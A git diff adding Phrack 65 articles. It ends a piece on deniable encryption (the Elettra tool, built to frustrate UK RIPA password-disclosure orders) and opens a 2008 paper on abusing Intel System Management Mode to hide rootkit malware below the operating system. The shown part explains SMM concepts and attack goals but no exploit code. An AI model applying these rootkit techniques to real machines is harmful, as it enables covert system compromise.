+1f) A distributed server like "project R*" from "Autistici/Inventati" [5].
+1g) Use one of the other infinite solutions, because we should move 
+    ourselves among the RFCs, spreading software automatically and always 
+    find new ways to bypass the law description.
+
+The Internet for the mere users is only "the web", whilst we have more 
+possibilities. But we fail to keep our servers online, or to publish our
+information without problems, because we are not using the best solutions
+in strong encryption and network distribution.
+
+
+------[  2. DEEP FOCUS, AND REAL TARGET: RIPA III
+ 
+RIPA (investigation of electronic data protected by  encryption - power to 
+require disclosure, [6]).
+
+In practical terms, it is the possibility for an UK investigator to 
+request the password protecting an encrypted file: in  case of refusal or 
+impossibility to give the password, the user it is punishable with up to 
+two years' imprisonment.
+
+Comparing this with the real life, it is the equivalent of a law requiring
+a suspect to open his safe to investigators. But computers and the Internet
+move on other schemes.
+In addition, this law is specifically making the UK less secure. 
+Let's see why: 
+
+- A person possessing an encrypted archive containing secrets potentially 
+  incriminating for a more than 2 years punishment will accept the 2 years 
+  imprisonment instead of revealing the password.
+
+- The one whose encrypted archive doesn't contain secrets incriminating, 
+  but sensitive political, personal information, will give them to police 
+  (or, more often, to private consultants that practically proceed with the
+  forensic examination).
+
+- Theoretical security is not achieved by delegating the power to control 
+  to an institution, because if this is corrupted it would become the 
+  gateway for any sort of abuse. Theoretical security can be achieved by 
+  preventing future crime, not by applying controls in order to act as a 
+  deterrent.
+
+Following the logic presented in the point 2 of this document, a safer way
+to avoid RIPA-III is to use a more sophisticated way of protection. 
+
+Encryption models use to define actors (Alice & Bob) and scenarios (with 
+Mallory, Eve and the Family of Attack). The encryption model required to 
+hide the data, and the presence of encrypted data, is steganography [7].
+In our scenario it is enough to demonstrate the absence of encrypted data,
+and cryptography offering a "plausible deniability" is our solution.
+
+Deniable cryptography allows a user to protect his data by plausibly deny 
+existence of hidden data inside an encrypted file. This kind of protection 
+is very useful when the user is compelled to give up the password by 
+violent or intimidating methods [8]. Different forms of deniable 
+cryptography are currently used:
+- TrueCrypt [9] implements full disk encryption. The image of a second 
+  encrypted disk is hidden inside free sectors of a container filesystem. 
+  Since a TrueCrypt disk is first filled with random data, it is not 
+  possible to differentiate between free sectors with random data on them 
+  and sectors with encrypted data of the hidden volume. As a consequence of
+  this, the TrueCrypt user can plausibly deny existence of the hidden disk.
+- OTR (Off-the-Record messaging) [10] is a cryptographic protocol that 
+  provides strong encryption for instant messaging. After authenticating 
+  the user (via key fingerprint comparison) it encrypts messages without 
+  checking their digital signatures. This lack of integrity check allows 
+  the sender of a message to plausibly deny sending that message since any 
+  other user could have been the sender. 
+- 2c2/4c [11]: It takes two input files and generates an output. 
+  Depending on the password used it decrypts one file or the other.
+
+The goal of deniable cryptography is to deny the existence itself of a 
+piece of information. Steganography has the same goal (steganalysis is 
+effective only after the existence of hidden data has been proven), but it 
+is more ambitious in hiding the data to the adversary because it carefully 
+chooses a container that prevents an analyst to realize that the container 
+covers hidden information. In case of an encrypted file, the attacker 
+already knows it could contain valuable information; the aim now becomes to
+deny the existence of the data inside the exposed container: in such a
+situation, deniable cryptography has higher signal-to-coverdata ratio 
+compared to steganography. 
+
+------[ 3. Elettra
+
+Elettra can generate archives of multiple files where a different file is 
+extracted depending on the password provided. 
+This because the password used for encryption is not only an "information 
+required for decrypt" one file in the archive, is also the "information 
+required to find" a file in the archive. 
+Every file is encrypted with its own password. Every password unlocks
+a single file. Since elettra can add random padding to an archive, it's 
+impossible to determine how many files are contained in it.
+
+Plausible deniability consists in allowing the user to deny existence of 
+other files except the only file he revealed the password to.
+
+Elettra bases its security on mathematical principles derived from 
+reverse-engineering on the RIPA and its possible interpretations.
+
+Elettra is a command line program developed for POSIX systems (tested under
+Linux, cygwin and MacOSX). A GUI wrapper developed in wxWidgets has been 
+developed and both software, with related gpg signature, are available at:
+
+https://www.winstonsmith.info/julia/elettra
+
+Despite the fact that the GUI was coded in a tenth of the time spent for 
+Elettra, it helps a dramatically wider range of users to understand and use
+the program. Usability and easiness of distribution of a software have 
+rarely been a goal for hackers, but this time we want to highlight and 
+spread a way of action/reaction made possible by open source technologies 
+and a network able to quickly communicate a content. The GUI is a necessary
+compromise between features and usability :)
+
+How to use Elettra:
+
+user@linz:~/elettra/src/build$ ./elettra        
+./elettra by julia@winstonsmith.info, http://www.winstonsmith.info/julia
+You should improve the quality of life, using privacy enhancing technology!
+./elettra encrypt outputfile [size increment]% plainfile[::password] 
+./elettra decrypt cipherfile [password] [output directory]
+./elettra checkpass password(s)
+./elettra example (show examples of use)
+- passwords, if not available, is ask with echo off
+
+Elettra in encrypt mode 
+
+user@linz:/tmp$ ./elettra encrypt output 10% file1::passwd1 file1::passwd2
+user@linz:/tmp$ ls -l file1 file2 output 
+-rw-r--r-- 1 user user  7132 Jan 15 18:35 file1
+-rw-r--r-- 1 user user 36287 Jan 15 18:35 file2
+-rw-r--r-- 1 user user 29027 Jan 17 10:35 output
+
+Further generation of /tmp/output file, with the same file/password:
+
+-rw-r--r-- 1 user user 30744 Jan 17 10:36 output
+-rw-r--r-- 1 user user 32018 Jan 17 10:36 output
+-rw-r--r-- 1 user user 29533 Jan 17 10:36 output
+
+One goal of the algorithm is that the outputs differ given the same input.
+In practice you can keep the smallest output.
+
+here are some outputs with a padding of 100%
+
+-rw-r--r-- 1 user user 65198 Jan 17 11:43 output
+-rw-r--r-- 1 user user 54336 Jan 17 11:43 output
+-rw-r--r-- 1 user user 57579 Jan 17 11:43 output
+-rw-r--r-- 1 user user 64938 Jan 17 11:43 output
+-rw-r--r-- 1 user user 67284 Jan 17 11:43 output
+-rw-r--r-- 1 user user 29219 Jan 17 11:43 output
+-rw-r--r-- 1 user user 48946 Jan 17 11:43 output
+-rw-r--r-- 1 user user 37260 Jan 17 11:43 output
+
+and some with 1000%:
+
+-rw-r--r-- 1 user user 247351 Jan 17 11:43 output
+-rw-r--r-- 1 user user 109079 Jan 17 11:43 output
+-rw-r--r-- 1 user user 303188 Jan 17 11:43 output
+-rw-r--r-- 1 user user 301261 Jan 17 11:44 output
+-rw-r--r-- 1 user user 290419 Jan 17 11:44 output
+-rw-r--r-- 1 user user 288720 Jan 17 11:48 output
+-rw-r--r-- 1 user user 114376 Jan 17 11:48 output
+-rw-r--r-- 1 user user 169173 Jan 17 11:48 output
+-rw-r--r-- 1 user user 197720 Jan 17 11:48 output
+-rw-r--r-- 1 user user 114376 Jan 17 11:48 output
+-rw-r--r-- 1 user user 266452 Jan 17 11:48 output
+
+
+The third argument is the filename of the archive that is going to be 
+created.
+The fourth argument (optional) is the amount of random padding that will be
+inserted at the beginning or appended at the end of the compressed archive.
+
+Padding can vary between 10% and 1000%.
+
+How encryption works in Elettra:
+
+Elettra has five command: encrypt, decrypt, checkpass, help and example.
+
+Is executed with: elettra command [args]
+
+We want to encrypt file /tmp/ls-manpage and /tmp/ps-manpage. 
+two file = two password we use "weirdness" and "foxnewsshower", the order 
+link:
+        ls-manpage (weirdness)
+        ps-manpage (foxnewsshower)
+
+$ ./elettra encrypt /dev/shm/output 15% /tmp/ls-manpage::weirdness \
+/tmp/ps-manpage::foxnewsshower
+
+the size of our source file are:
+
+$ ls -l /tmp/ls-manpage /tmp/ps-manpage 
+-rw-r--r-- 1 user user  7132 Jan  8 05:57 /tmp/ls-manpage
+-rw-r--r-- 1 user user 36287 Jan  8 05:57 /tmp/ps-manpage
+
+The command line specifies 15% of random padding. Required args for the 
+"encrypt" command, are the output file, the source files and the passwords.
+If passwords are not inserted via command line, they are prompted 
+interactively.
+
+Before the encryption gzip compression is used, the output file is:
+
+$ ls -l /dev/shm/output 
+-rw-r--r-- 1 user user 42615 Jan  8 06:13 /dev/shm/output
+
+Now we have an encrypted archive. The elettra decryption routine takes a 
+password and, optionally, a destination directory:
+
+$ ./elettra decrypt /dev/shm/output weirdness /dev/shm/
+$ ls -l /dev/shm/
+-rw-r--r-- 1 user user  7132 Jan  8 06:32 ls-manpage
+-rw-r--r-- 1 user user 42615 Jan  8 06:13 output
+
+If you want to check your passwords, use the command "checkpass":
+
+./elettra checkpass actresss weirdness shoeless
+password(s) combinations work ok, with password block of 512 bytes, use it.
+
+If checkpass or encrypt command receive a bad password sequence, notice 
+to the users.
+
+This is how an elettra output file looks like:
+
+RRRRRRRRRRRRRRRRRRRRRRRRRRRRRRKKKKKKKKKKKKKKKKKKKKKKKKCCCCRRRRRRRRRRRRRRR
+RRRRRRRRRRRRRRRRRRRRRRKKKKKKKKKKKKKKKKKKKKKKKKCCCCRRRRRRRRRRRRRRRRRRRRRRR
+RRRRRRKKKKKKKKKKKKKKKKKKKKKKKKCCCCRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRR
+        /-- end of initial keyblock, start of data section --/
+RRrrrrccccllllddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
+dddddddddddddddddddddddddddddddffffFILE1PPPPPRRRRRRRRRRRRRRRRRRRRRRrrrrcc
+ccllllddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
+dddddddddddddddddddddddffffFILE2PPPPPRRRRRRRRRRRRRRRrrrrccccllllddddddddd
+ddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
+ddddddddffffFILE3PPPPPRRRRRRRRRRRR
+
+K = Key
+C = checksum of password
+R = random padding (before the entry point)
+r = random encrypted bytes (used in AES CBC)
+c = checksum of key
+l = length of the compressed file
+d = compressed data
+f = length of filename
+FILE1, FILE2, FILE3 names of decrypted file
+P = encrypted padding to fill the minimum AES-128 block up to its end
+Random padding is generated with cyclic SHA256 functions.
+
+K and C are in the first segment, called "initial keyblock", the other 
+components are the data in the elettra archive.
+
+Here's how the file is created:
+
+encrypt takes OUTPUT PADDING FILE[1..N] PASSWORD[1..N] arguments
+
+try for n in [1 .. N]
+	HASHp_n =hash(PASSWORD_n)
+
+Each of these hashes is required for obtaining an unique number dependent
+from the password.
+This unique number (which is modulo the initial keyblock size) is named 
+"entry point" thus obtaining an entry point for each file in the archive.
+It is called entry point because it identifies the point where reading will
+start at decryption time
+
+ initial keyblock:
+
+ /----------------- keyblock length: 512 + (x * 256) ----------------/
+
+ +--------------+--+----+--+--------+--+----------------------+--+---+
+ |              |  |    |  |        |  |                      |  |   |
+ |  Random      |  | R  |  |  R     |  |    Random            |  |   |
+ |              |  |    |  |        |  |                      |  |   |
+ +--------------+--+----+--+--------+--+----------------------+--+---+
+                ^ ^
+                | |
+  entry point --+ |
+                  +- password block struct (32 byte)
+
+The keyblock length is not hardcoded but its value is choosen in an 
+adaptive way in such a way as to avoid password struct block collisions.
+A collision occurs if two or more password struct blocks overlap.
+Obviously a collision may disrupt the information contained in the initial
+keyblock and as such it has to be avoided.
+
+The password struct block is encrypted with the PASSWORD[1..N], and 
+contains an unsigned int checksum and a 28 byte KEY[1..N]. 
+
+This mean that each password computation identifies an entry point inside 
+the initial keyblock where the key resides encrypted in 28 of the 32 byte 
+of password struct block.  The other data in the initial keyblock are 
+random.
+
+This is the algorithm shown in pseudocode:
+
+ for x in [1..12]:
+ {
+    size = (random_between(1, 12) * 256 ) + 512
+    size = size + ( N * 256 )
+
+    create keyblock[size]
+
+    for n in [1..N]
+       add_password_hash_to_keyblock(HASHp_n);
+
+    if keyblock[size] has collision
+       continue;
+    else
+       use size as good value
+ }
+
+When a keyblock size is found, continue to the next step: creation of
+data section.
+
+ for n in [1..N]:
+ {
+    GZ-FILE-LEN_n = gzip(FILE_n)
+ }
+
+ totalsize = keyblock size
+ for n in [1..N]:
+ {
+    MIN-EP_n = totalsize;
+    totalsize = totalsize + (GZ-FILE-LEN_n * PADDINDG% )
+    MAX-EP_n = totalsize;
+    totalsize = totalsize + GZ-FILE-LEN_n
+ }
+
+In this step we'll get the total length of the Elettra archive to build 
+through using two arrays MIN-EP[1..N], MAX-EP[1..N] defined later.
+
+Suppose to encrypt two elements:
+
+         /----- GZ-FILE-LEN 1 ------/       /----- GZ-FILE-LEN 2 -----/
+ +-------+--------------------------+-------+-------------------------+
+ |       |                          |       |                         |
+ |   R1  |       GZ-FILE1           |  R2   |      GZ-FILE2           |
+ |       |                          |       |                         |
+ +-------+--------------------------+-------+-------------------------+
+ ^       ^                          ^       ^
+ |       +--- MAX-EP1       MIN-EP2 +       |
+ +- MIN-EP1                                 +-- MAX-EP2
+
+R1 and R2 are two padding blocks. The dimension of these blocks depends 
+on the padding % value, the size of the compressed file and a bit of 
+random.
+
+The entry point for identifying FILEn position MUST fall between MIN-EP_n 
+and MAX-EP_n. 
+This second entry point is derived from KEY_n and so the keys KEY[1..N] are
+chosen in order to fulfill this requirement following the algorithm 
+reported below:
+
+ for n in [1..N]:
+ {
+   for x in [1..10000]:
+   {
+      KEY_n = random()
+      HASHk_n = HASH(KEY_n)
+      EP_n = HASHk_n % totalsize
+      if( MIN-EP_n < EP_n < MAX-EP_n)
+        return KEY_n;
+   }
+ }
+
+     /----- GZ-FILE-LEN 1 -----/        /----- GZ-FILE-LEN 2 -----/
+ +---+-------------------------+----+---+-------------------------+---+
+ |   |                         |    |   |                         |   |
+ | R |     GZ-FILE1            | R  | R |      GZ-FILE2           | R |
+ | 1 |                         | 2  | 3 |                         | 4 |
+ +---+-------------------------+----+---+-------------------------+---+
+     ^                              ^   ^                         ^ 
+     |                              |   |                         |
+     +--EP1                MIN-EP2--+   + EP2                     + B
+
+ R1 is the first block of random (from MIN-EP1 to EP1)
+ R2 is the post file padding (from EP1 + GZ-FILE-LEN to MIN-EP2)
+
+Every file is written between two random sequences of padding blocks. 
+The length of each padding sequence is random. Every length is plausible 
+before and after a given file, because the attacker doesn't know the 
+padding percentage requested at encryption time.
+
+Now the algorithm has retrieve:
+
+1) The length of inital keyblock
+2) The entry points derived from the passwords
+3) The keys
+4) The padding sections
+5) The internal structs used for keeping file names, file lengths and 
+   checksums saved before the file data just after EP_n
+
+Now it's simply a matter of opening a file, writing the initial keyblock 
+and the data section and save.
+
+Decryption sequence for Elettra:
+
+1) Password and input file are given
+2) The password is hashed and this value (referred as HASHp) is used to 
+   search the initial keyblock size. The possible value are obtained with 
+   the following algorithm
+
+   for x in [1..80]:
+     try_size = 512 + ( 256 * x );
+
+   When the password is able to decrypt the first 32 bytes pointed by 
+   HASHp modulo try_size and to verify the internal checksum, the initial 
+   keyblock size is identified.
+3) Read the key from the initial keyblock, decrypt it and evaluate its hash
+   modulo the file total length.
+4) Decrypt the first 32 bytes. If the checksum matchs, decrypt the file 
+   length, decompress it and rename it with its original name.
+
+Conclusions about algorithm: 
+
+An analyst that will have to analyze files encrypted by using Elettra will
+not be able to make any assumption a priori, since the algorithm aims at 
+behaving randomly in order to make any output plausible. Every Elettra 
+output file should contain one or more file, and is plausible assume that 
+only one file had been encrypred, because the padding before and after the 
+decrypted file seem plausible random padding.
+
+The security of this algorithm is based on the propriety of encrypted data
+to appear fully random over a statistical analysis. An attack which is able
+to detect the difference between compressed+encrypted data and random data 
+could exploit Elettra.
+
+An example of plausible deniability:
+
+The analyst has found a 1.4Mb long file, encrypted by using Elettra.
+Using the user provided password, he extracts a .pdf file 2Mb long.
+Then, the following is plausible:
+
+A: the user has ran Elettra with a 40% proportional padding. The file size 
+was 2Mb and it has been compressed in 1 Mb. Before the beginning and after 
+the end of the file a total of 400k bytes of random padding has been added.
+
+But it is also likely that:
+
+B: the user has used a 2Mb long .pdf as covert file and a 200k file of 
+secret data. The compressed size of the .pdf was 1Mb, but the other file 
+could not be compressed anymore, so its size stayed 200k. From 1Mb 
+compressed .pdf + 200k of secret file and a 16% proportional padding it has
+been created the 1.4Mb resulting file.
+
+Both cases are plausible: either way the analyst has a password that 
+extracts a .pdf file 2Mb long that compresses in 1Mb. The analyst could 
+then inspect which part of the file is decrypted, but the position of an 
+encrypted file in the archive gives no information, since it is plausible 
+that both before and after each file in the archive there is random data.
+
+Elettra has been developed with these attacks and countermeasures in mind:
+
+1) Files are encrypted with AES-128, random padding is the output of SHA 
+   functions and it is also mathematically impossible to say if data is 
+   encrypted or just random noise;
+2) It is not possible to make assumptions based on the final size of the 
+   archive (e.g. verifying if the padding is a whole quantity or a 
+   fraction is useless because the proportional increase of dimension 
+   supplied by the user is not used as is, but a new value is derived from 
+   it;
+3) Checksums used to verify integrity of passwords are implemented, and
+   are checked before the decryption of files;
+4) In algorithms that work in CBC mode, first bytes are initialized with 
+   random data to make cryptography stronger;
+5) The probability distribution of random data is equal at the beginning 
+   and at end of the encrypted file.
+6) Minimum password length is 6 bytes. 
+7) Disclose a password or a key doesn't give to the attacker any 
+   information useful for attacks. 
+
+Elettra counts more or less 1600 lines of source code. Every other coder 
+could have found other ways to accomplish the same task, even less complex 
+than the one presented in this article that requires to remember multiple 
+different passwords. In such kind of program there is always room for 
+improvements. The important thing to think about is that in a couple of 
+weeks somebody could develop something unforseen and unexpected by laws, 
+but still perfectly legal.
+
+------[  4. THE ANONYMOUS IDENTITY: julia@winstonsmith.info
+
+The name Julia comes from the novel "1984", as the whole Winston Smith 
+Project. Julia shows to Winnie the way, the tools and the motives for 
+freedom. Thus, this Julia - just when the Internet is fighting for its 
+freedom - wants to be the one who demonstrates how laws written by 
+politicians are incoherent, inconsistent, unnecessary.
+
+Spreading techniques aimed to the human rights protection on the Internet
+have a goal that is not related to personal visibility. On the contrary, in
+some cases personal safety can be endangered by the spreading of the 
+technique. Thus, other spreading techniques have to be evaluated.
+
+We created an anonymous group identity to have a single reference point 
+(a name, a keyword, an ideal). This experiment brings us some advantages:
+- Visibility is obtained as a collective effort, and can survive the single
+  work
+- Coders minimize legal and personal risks
+- Both individual confrontation and preservation of one's identity inside
+  the group are diminished 
+- At the moment there is no central blog or web site, as centralizing means
+  being exposed to the risk of being censored, attacked or to draw unneeded
+  attention
+- The collective identity identifies itself through a digital signature, 
+  and media can be distributed using p2p, web sites, blogs, usenet.
+  The most choices we have, the most options we can consider.
+- We are a network made up of people around the world with the skills, 
+  the knowledge and the ability to deeply understand problems related with
+  our countries.
+
+Those who want to team up with julia@winstonsmith.info can write an email
+message (we strongly suggest using an anonymous remailer or TOR and a throw
+away email address).
+
+The anonymous identity will not have a web site to express itself, Elettra
+gets served from url http://www.winstonsmith.info/julia/elettra.
+Please note that this is done just for convenience, and has no relationship
+with the anonymous identity.
+
+The only way to verify the authenticity of the source is the digital 
+signature of media using the following key:
+
+-----BEGIN PGP PUBLIC KEY BLOCK-----
+Version: GnuPG v1.4.7 (Darwin)
+
+mQGiBEdqIL0RBAChcjI1XSCY6uBj8tt822t3QAIrbUgIL1f+fknclPHPQqjyv+DI
+H793WaP2TlJ0mPNJqK2D8pyhO1l8MMzZIzNq+86zblogLklYUo68LbznUPJYNl0f
+5Idg6DoNHO7JyXxU1aKq15sLD92izRX5g6Jx7V14DTP/gIB+vZjtcykBZwCgmqC1
+YZv/KKVtoSyX/QR0YdJk5ecEAJPurJEm82wshma7RxuOL5UDBhRR4WUBquYa5L35
+rTeswSZ/5MFAX4G3VWNb28RZMcDKrd2XIbPA/NI8uVNPEmtmdrF4bA7IGYYPmwuz
+SsL3MN0YcDdh8slrqNBuBFNsH95xm4FQKWc+rPPYvZVSsLBosJz9OXPJJYVh61X8
+KDSzA/9bovS6D8e02en5t3XScUSBdU4GCHqqgRLpbfTECSXm2KhA2TtnSQ84lqCL
+eKs4i955xmF6vQ3bZIATpohSPBz/CdvVPcwNIffVxAwX4bDJDdkXkvd2prWibBJ4
+VSzcNVfyvRgYGbrTjq7Aok1f3d/GCQz0oMzGLhs8ZY0xkRNJD7Q0anVsaWEgKGFu
+b255bW91cyBpZGVudGl0eSkgPGp1bGlhQHdpbnN0b25zbWl0aC5pbmZvPohgBBMR
+AgAgBQJHaiC9AhsDBgsJCAcDAgQVAggDBBYCAwECHgECF4AACgkQ83466PEEGF9S
+BgCeIrFkSGSUlOYhXZCNcGmmMrB1h1wAnRUL6+VOQ0SxbYTnTpDIMgGwA3byuQL1
+BEdqIL0QC6C3T5hpVjgCTHUjbhu/gql/hHQV0u6av5fDGAYZmQPcDRYb5FP76+Kp
+6DDLsSDo95DG1STO8QjRNrrz8tOftC6+F4kMxh1KvcyWEeam8GxYMytpQwDN2Nqr
+J3tV9Q24Nv4wUd7vHNqBlcJKeWyQGxBzebelBgAOyMb4YsIGEZJgR4F+o1R2jQYW
+rcNPp11aJtxyl2dApaHulzEjMCIDNKnJpbi4lLuqGVaht5NMypxsRnclb1Nw87VY
+jrhyJNGT4tojm7ERzJjNLUenTgda788ivWIse68t5WHh7BIGMyNiMKMGjI2R81ei
+c+M+O/wL59eh6EGv7V3nZz6qB07f8i3fsNgUF1YFrB2nHtEQTWvb62oGZG+OP5Fp
+tGyNhH3HN1VhBRg0eGSEZCGFHZU2chGyOPMqynfsf7o8dkNi8+Ydd0eIn3TlH6of
+Xy/TqlQAWS5BUhBX7CEpiO1XPh07o2FLyRPQiElSJ3inCh4sOde/vuFp7RMAAwYL
+n3i13almOtHB4qz0J4h/J8TgDaHYmAidYRpr9m6LpKysomHNrtj2U0Am2DmjI25H
+LvkOECX9x9yp98WGlzOllZA++YnCSpuG4b03VsLPqmD/r/VdcXrli5cs+UB7O8L2
+2P19L+RO89+SieDEKHrKbfkkM3w4OJ+5/mfxejNfoRh0/GBJgoWGj+h/dChmvE7O
+alCFDJ5q8Q1QyHMNbMuZxfub+TnpINeHkwiMeaFZRcmaBtjb7T3J+EPf0dUtxXBQ
+0F8RzypLEI8FLV/SU+pkynCkp2o6wnRVs8Lms6xci1WE1asr+2Xp9vLN4ppIfo6x
+reYKegPcFAw21UuBx6c7OKzEwRFB0OUSGS1Mdzt0ekq2j6Axk5WVShsDcdW+SI5N
+fKKqSCWSQE9dbekHUXpBkkbI85uJ2F6QOtMFEJGlw5XTAvJyuamVqXyq6SE5AyVL
+bQ9bfCtizrCOn3h547m7nm6RQ+3JfnCVjJqB9eFtP6WFIsDKKIhJBBgRAgAJBQJH
+aiC9AhsMAAoJEPN+OujxBBhf16YAnRJLQTTY6JiJGDJG4f2JJFUxereAAJ9hXs0P
+/yO+HtkGHnfSuwoaRvSQdw==
+=+vKf
+-----END PGP PUBLIC KEY BLOCK-----
+
+Whoever shares the objectives of the Julia project can contact the address
+julia@winstonsmith.info (anonymously or not).
+
+Future objectives are not clear, still.
+It would be interesting to put together a list of all the world's laws and 
+the technologies which render them useless. Somewhere this activity may be 
+seen as misdemeanor incitement, that's why we choose an anonymous identity,
+and no fixed media to publish material.
+
+Julia was not born by the will of a single person, but because we felt the
+need of other people to be able to share and give information and 
+techologies that can help build freedom of expression, privacy rights, 
+technological awareness. Julia is just a landmark, whoever shares the same 
+aims can pursue them without it.
+
+No vendor and no State, however much we can respect it, can rule the 
+Internet. Open technologies belong to everybody.
+
+-------[  5. REFERENCES
+
+[1] http://www.torproject.org/docs/tor-hidden-service.html.en 
+[2] http://en.wikipedia.org/wiki/Freenet
+[3] http://www.andrebacard.com/remail.html
+[4] http://pajhome.org.uk/crypt/sda/index.html
+[5] http://www.autistici.org/en/who/rplan/index.html
+    http://dev.autistici.org/orangebook/ 
+[6] http://www.opsi.gov.uk/acts/acts2000/ukpga_20000023_en_8
+[7] http://www.cl.cam.ac.uk/~rja14/Papers/jsac98-limsteg.pdf
+[8] http://en.wikipedia.org/wiki/Rubber-hose_cryptanalysis
+[9] http://en.wikipedia.org/wiki/TrueCrypt
+[10] http://en.wikipedia.org/wiki/Off-the-Record_Messaging
+[11] http://lcamtuf.coredump.cx/soft/2c2.tgz
diff --git a/phrack65/7.txt b/phrack65/7.txt
new file mode 100644
index 0000000..03fd5ff
--- /dev/null
+++ b/phrack65/7.txt
@@ -0,0 +1,1309 @@
+                             ==Phrack Inc.==
+
+               Volume 0x0c, Issue 0x41, Phile #0x07 of 0x0f
+
+
+|=-----------------------------------------------------------------------=|
+|=-----------------=[ System Management Mode Hack    ]=------------------=|
+|=-----------------=[ Using SMM for "Other Purposes" ]=------------------=|
+|=-----------------------------------------------------------------------=|
+|=-----------------------------------------------------------------------=|
+|=---------------=[ By BSDaemon                          ]=--------------=|
+|=---------------=[ <bsdaemon *noSPAM* risesecurity_org> ]=--------------=|
+|=---------------=[                                      ]=--------------=|
+|=---------------=[    coideloko                         ]=--------------=|
+|=---------------=[ <cdlk     *noSPAM* kernelhacking_com>]=--------------=|
+|=---------------=[                                      ]=--------------=|
+|=---------------=[    D0nAnd0n                          ]=--------------=|
+|=---------------=[ <d0nand0n *noSPAM* kernelhacking.com>]=--------------=|
+|=-----------------------------------------------------------------------=|
+|=--------------------------=[ March 29 2008 ]=--------------------------=|
+|=-----------------------------------------------------------------------=|
+
+					"Very nice! How much?"
+						- Borat Sagdyiev
+
+------[  Index
+
+  1 - Introduction
+    1.1 - Paper structure
+
+  2 - System Management Mode
+    2.1 - Pentium modes of operation
+    2.2 - SMM Overview
+	2.2.1 - SMRAM
+	2.2.2 - SMI Handler
+	2.2.3 - SMI Triggering
+	2.2.4 - Duflot discovery - Exploit
+    2.3 - Duflot misses
+    	2.3.1 - PCI Configuration
+	2.3.2 - Why and when the system generates a SMI
+    2.4 - SMM Internals - Our first experiences
+	2.4.1 - Analysing the SMM registers
+	2.4.2 - SMM Details
+
+  3 - SMM for evil purposes
+    3.1 - Challenges
+        3.1.1 - Cache-originated overwrites
+        3.1.2 - SMM Locking
+        3.1.3 - Portability
+	3.1.4 - Address translation 
+    3.2 - Copying our code in the SMM space
+	3.2.1 - Testing
+	3.2.2 - Descriptor caches
+        3.2.3 - Code relocation
+
+  4 - SMM Manipulation Library
+
+  5 - Future and other uses
+
+  6 - Acknowledgements
+
+  7 - References
+
+  8 - Sources - Implementation details
+
+
+------[ 1 - Introduction
+
+This article will try to explain some details about the Intel Architecture
+[1] and how it can be manipulated by a malicious user to create a complete
+hardware-protected malware.
+
+Also, since the main focus of the article are the System Management Mode 
+[1] features, we will go into details of the Duflot [2] study and beyond,
+showing how to create a stable system running inside the SMM [3].
+
+It's important to mention that everything showed here is really
+processor-bridges-dependent (we are focusing on Intel processors [1]).
+
+Since inside the SMM a malware could manipulate the whole system memory, it
+can be used to modify kernel structures and create a powerful rootkit.
+
+
+---[ 1.1 - Paper structure
+
+The idea of this paper is to complete the studies about SMM, explaning how 
+to use it for evil purposes.
+
+For that, the paper have been structured in two important portions:
+	
+Chapter 2 will give a basic knowledge of the Pentium modes of operation
+(needed to better understand the other portions of the chapter) and them 
+will introduce what was the Duflot discoveries related to that.  After that
+the chapter will explain what Duflot missed, explaining why the system
+behaves in the way that permits our uses, and introducing the SMM internals
+and our library to manipulate the SMM.
+Chapter 3 will explain how to use the SMM for evil purposes, explaning
+the challenges to use the SMM and giving pratical samples on the use of our
+library.
+
+
+------[ 2 - System Management Mode
+
+From the Intel manuals [1]:
+	"The Intel System Management Mode (SMM) is typically used to execute
+specific routines for power management. After entering SMM, various parts 
+of a system can be shut down or disabled to minimize power consumption. SMM
+operates independently of other system software, and can be used for other
+purposes too."
+
+Everytime we read something like "and can be used for other purposes" we
+start to think: what the hell?  What kind of other purposes?
+
+It's interesting that every single sample in the Internet just points to
+energy-related uses of the SMM, and says nothing about other purposes.
+
+In 2006, Duflot and others [2] released a paper about how to use the SMM to
+circumvent operating system protections.  It was the first time that a
+misuse of the SMM was shown, and it gave some ideas (like how to put a code
+in SMM,  how to manipulate the system memory inside SMM and how to force a
+system to enter the SMM), leaving open many questions that will be answered
+here (how to create a really stable code to subvert the SMM, how to
+manipulate the SMM registers, difficulties in create a stable system
+running inside the SMM and why the system behaves in the way he just said
+in the paper).
+
+
+---[ 2.1 - Pentium modes of operation
+
+Everybody already knows about the modes of operation of the P6 family of
+processors.
+
+Real-mode is a 16-bit addressing mode, keept for legacy purposes and 
+nowadays just used in the boot process.  Protected mode is a 32-bit mode 
+and provides the protection model used by the modern operation systems.
+
+The Virtual 8086 mode have been introduced to garantee greater efficiency 
+when running programs created for older architectures (such as 8086 and 
+8088).
+
+The System Management Mode (SMM) is another mode of operation that, as 
+already said, is supposed to be used to manage power functions.
+
+Volume 3 of the Intel processor manuals [1] already explained the 
+acceptable transitions between those modes:
+
+         -------------------                    SMI (interrupt)
+      |->|Real Address Mode| -------------------------------------------|
+      |  ------------------- <----------------------------------|       |
+      |  | PE=1    ^ PE=0 (requires ring0) or                   |rsm or |
+      |  v         | reset                                      |reset  V
+      |  -------------------                                    ---------
+reset |  | Protected Mode  | -------> SMI (interrupt) ------> | SMM Mode |
+      |  ------------------- <------- rsm instruction <------   ---------
+      |  | VM=1    ^ VM=0                                       |       ^
+      |  v         |                                            |rsm    |
+      |  ------------------- <----------------------------------|       |
+      |- |Virtual 8086 Mode| -------------------------------------------|
+         -------------------                    SMI (interrupt)
+
+
+P.S.: PE and VM are flags of the CR0 (control register 0)
+
+Basically what we need to get from here is:
+	- Any mode of operation in the intel platform can make a transition to
+        the SMM mode if an SMI interrupt is issued.
+	- SMM mode will return to the previous mode by issuing a rsm
+	instruction (so the processor will read a saved-state to restore the
+	system to the previous situation before enter the SMM).
+
+---[ 2.2 - SMM Overview
+
+First of all, when the system enters the SMM mode, the whole processor 
+context must be saved in a way so that it can be restored later. By doing 
+so, the processor can enter in a special execution context and start 
+executing the SMI handler.  To return from this mode there is the special
+instruction RSM (can be used just inside the SMM itself) that will read the
+saved context and return to the previous situation).
+
+Also, in SMM the paging is disabled and you have a 16-bit mode of operation
+, but all physical memory can be addressed (more on this later).
+
+There are no restrictions to the I/O ports or memory, so we have the same
+privileges as in Ring 0 (in fact, from SMM someone can just manipulate all
+the system memory).
+
+What Duflot showed is a way to put your own SMI handler, force the 
+processor to enter the SMM mode, change the system memory to bypass a 
+security protection (in his case, the securelevel of an OpenBSD system) and
+then execute his own code changing the saved context to point to it.
+
+---[ 2.2.1 - SMRAM
+
+The System Management Mode has a dedicated memory zone called SMRAM.  It's
